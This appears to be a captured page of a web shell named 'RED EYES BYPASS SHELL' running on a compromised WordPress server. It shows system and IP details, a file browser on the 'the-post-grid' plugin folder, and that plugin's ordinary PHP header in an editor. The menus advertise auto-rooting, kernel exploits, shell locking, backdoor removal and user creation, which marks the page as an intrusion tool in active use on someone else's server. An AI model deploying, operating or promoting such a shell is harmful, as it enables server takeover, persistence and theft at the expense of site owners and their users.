Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
the-post-grid /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
README.txt
17.06
KB
-rwxr-xr-x
index.html
0
B
-rwxr-xr-x
the-post-grid.php
1.21
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : the-post-grid.php
<?php /** * Plugin Name: The Post Grid * Plugin URI: https://www.radiustheme.com/downloads/the-post-grid-pro-for-wordpress/ * Description: Fast & Easy way to display WordPress post in Grid, List & Isotope view ( filter by category, tag, author..) without a single line of coding. * Author: Post Grid Team by RadiusTheme * Version: 7.8.7 * Text Domain: the-post-grid * Domain Path: /languages * Author URI: https://radiustheme.com/ * * @package RT_TPG */ // Do not allow directly accessing this file. if ( ! defined( 'ABSPATH' ) ) { exit( 'This script cannot be accessed directly.' ); } define( 'RT_THE_POST_GRID_VERSION', '7.8.7' ); define( 'RT_THE_POST_GRID_AUTHOR', 'RadiusTheme' ); define( 'RT_THE_POST_GRID_NAME', 'The Post Grid' ); define( 'RT_THE_POST_GRID_PLUGIN_FILE', __FILE__ ); define( 'RT_THE_POST_GRID_PLUGIN_PATH', __DIR__ ); define( 'RT_THE_POST_GRID_PLUGIN_ACTIVE_FILE_NAME', plugin_basename( __FILE__ ) ); define( 'RT_THE_POST_GRID_PLUGIN_URL', plugins_url( '', __FILE__ ) ); define( 'RT_THE_POST_GRID_PLUGIN_SLUG', basename( __DIR__ ) ); define( 'RT_THE_POST_GRID_LANGUAGE_PATH', dirname( plugin_basename( __FILE__ ) ) . '/languages' ); if ( ! class_exists( 'rtTPG' ) ) { require_once 'app/RtTpg.php'; }
Close